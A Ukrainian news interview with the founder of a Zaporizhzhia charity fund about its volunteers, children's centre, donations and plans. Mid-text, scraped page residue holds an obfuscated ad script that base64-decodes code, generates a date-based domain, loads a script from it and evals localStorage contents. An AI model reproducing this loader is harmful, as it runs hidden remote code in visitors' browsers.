Малі кроки, великі зміни: як працює благодійний фонд “Союз милосердя” в Запоріжжі

Невелика ідея може перетворитися на велике добро. Чотири роки тому було створено благодійний фонд у Запоріжжі «Союз милосердя». Волонтери зрозуміли, що навіть маленький внесок може стати великим кроком до покращення життя інших.

Засновниця організації «Союз милосердия» Руслана Ткачук розповіла журналістам Акцента, з чого починалася історія фонда, як залучають волонтерів, які плани на майбутнє мають та чому зараз так важливо допомагати іншим. 

Як виникла ідея створення благодійного фонду «Союз милосердя»?

Чотири роки тому тому назад я і моя колега-подруга створили фонд. Ми відвідували церкву і завжди задумувалися про те, як можна зробити добрі справи і допомогти іншим людям. Нас надихала фраза, що хоча ми не можемо змінити весь світ, але ми можемо змінити світ однієї людини. Ми прагнули допомагати малозабезпеченим людям, бездомним, безпритульним та особливо дітям, які приходили з такими сім’ями до церкви.

Чи були приклади балгодійної діяльності, які ви бажали наслідувати?

Перш за все, ми побачили в інтернеті ініціативу в Харкові, де збирали подарунки для дітей з малозабезпечених сімей. Ми вирішили зробити те саме і виклали пост про те, що хочемо зібрати подарунки для дітей з потребуючих сімей. Ми запитали у дітей, чого вони хотіли б отримати на Новий рік, і склали список побажань. Більшість бажань були дуже скромними.

Пост виявився дуже популярним, і ми отримали чимало відгуків та підтримки. Так ми змогли зібрати подарунки для дітей з дитячих будинків та потребуючих сімей. Цей проект став нашим першим успішним досвідом.

Після такого позитивного досвіду ми вирішили офіційно зареєструвати нашу організацію, щоб продовжувати займатися благодійною діяльністю і залучати байдужих людей через інтернет. Ми прагнемо робити добрі справи і допомагати тим, хто потребує підтримки та уваги.

Скільки волонтерів налічує ваша команда і як ви їх знаходите?

Люди, які беруть участь у різних добрих справах, зустрічаються досить часто. Ми знаходимо їх через Instagram, де публікуємо пости про наші проекти. Багато з них стають нашими знайомими або вже мають спільних знайомих.

Наприклад, у проекті «Стань Сантою» для дітей ми мали учасників, які до цього були абсолютно незнайомі, але приєдналися, щоб допомогти. До війни в команді працювали 10-15 людей, зараз менше.

Ще одним цікавим випадком була співпраця з молоддю з нашої церкви. Деякі з нас не знали, як почати реалізовувати свої ідеї.

Зараз ми також співпрацюємо з соціальними службами, що дозволяє нам розширювати коло наших можливостей і досягати ще більшого впливу в наших проектах. Ми переконані, що важливо мати підтримку і співпрацю з організаціями, які ділять нашу місію допомагати людям у потребі.

Які категорії людей отримують допомогу від вашого фонду?

Зараз ми звертаємося до соціальних служб і орієнтуємося на конкретну категорію людей. Це можуть бути малоімущі, багатодітні родини, переселенці тощо. Також на базі фонду зараз функціонує дитячий центр.

В чому особливість цьоо дитячого центру?

Він працює щодня. Це місце, куди діти можуть знаходитися з обіду до вечора під наглядом соціального робітника або волонтери. Дітям вигадають ігри, заняття, перегляди фільмів, квест-комнати, спортивні змагання, настільні ігри тощо. Всім, хто звертається за допомогою, намагаємося допомагати. Ми не вимагаємо довідки та інші докази, ставимося до всіх з повагою. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Яким чином можна стати волонтером фонду «Союз милосердия»? Чи є якісь вимоги до потенційних волонтерів?

Критеріїв особливих немає. Ми приймаємо всіх людей, якщо є таке бажання. Погана людина не захоче займатися граними справами. Важливо, щоб у потенційного волонтера був вільний час. Варто об’єктивно оцінювати свій вільний час і розпоряджатися ним. Якщо людина відкликається на будь-який проєкт і, наприклад, хоче організувати майстер-клас в денному центрі, ми з нею зустрічаємося і обговорюємо час проведення.

Які види допомоги можуть надати особи, які бажають долучитися до благодійності, але не можуть стати волонтерами?

На жаль, поки що у нас немає складу, який міг би забезпечити належне зберігання речей. У зв’язку з цим ми рідко приймаємо пожертвування у вигляді речей і лише у невеликих кількостях, щоб швидко розподілити їх серед тих, хто цього потребує. Коли нам вдається отримати пожертви, ми одразу розкладаємо їх у коробки на вулиці та пропонуємо взяти людям те, що їм необхідно.

Денний центр також працює на благодійні внески, хоча в ньому доступні не лише розвиток для дітей, розваги, але й харчування. Також ми водимо дітей в кіно, на екскурсії. Все це робиться та буде робитися на пожертвування.

Якими способами ви залучаєте громадськість до підтримки благодійної діяльності вашого фонду?

З журналістами спілкуємося дуже рідко, лише у випадках, якщо вони сами зв’язуються з нами. Громадськість залучаємо через соціальні мережі — Інстаграм. Викладаємо пост, є кілька блогерів, які розповсюджують інформацію про діяльність нашого центру.

Які виклики та складнощі ви зустрічаєте в роботі благодійного фонду?

Головна перешкода полягає в залученні благодійників, волонтерів. Є проєкти, до яких легше залучити людей. Найчастіше мова йде про проєкти, пов’язані з дітьми. Краще, якщо допомога не фінансова. Збори коштів — це складніші проєкти. Наприклад, у нас є людина ВПО, яка приходила на безкоштовні обіди. Чоловік проживав у квартирі, куда в березні прилетіла ракета.

Йому вдалося вижити, проте в результаті чоловік 4 місяці відновлював своє здоров’я. У нього нікого немає. Глобальні збори коштів передбачали виплати коштів саме власниці квартирі. Про чоловіка, який орендував житло, ніхто по суті не знав. Він не отримав жодної фінансової допомоги. Ми ж організували збір, проте таку ініціативу було набагато складніше реалізувати.

Коли люди звертаються за допомогою, ми не можемо гарантувати стовідсоткову допомогу. Це благодійність, але ми намагаємося спрямовувати всі зусилля на підтримку всіх, хто цього потребує.

Волонтерам варто об’єктивно ставитися до ситуацій, людей, не пропускати все через себе, адже це морально дуже важко. Зустрічаються ситуації, коли люди маніпулюють, намагаються отримати найбільшу підтримку, проте це не завжди є аргументованим.

Які плани на майбутнє має засновник фонду «Союз милосердя»?

Ми переймаємо досвід інших благодійних організацій. Зараз у нас є цікавий формат допомоги, коли ми організовуємо чаювання. Люди похилого віку або одинокі приходять до нас в офіс, де ми спілкуємося з людьми, намагаємося надати психологічну підтримку.

Зараз ми відкрили дитячий центр і плануємо розширити його діяльність. Спілкування у дітей за останні роки дуже обмежене. Дуже мало часу діти проводять в живому спілкуванні. Тому ми плануємо залучити все більше дітей, і щоб у них був свій вільний простір. 

Публікацію створено за підтримки ГО «Інститут Масової Інформації» та Міністерства закордонних справ Королівства Нідерланди.
(adsbygoogle = window.adsbygoogle || []).push({});

Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/mali-kroki-veliki-zmini-yak-pratsyuye-blagodijnij-fond-soyuz-miloserdya-v-zaporizhzhi/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top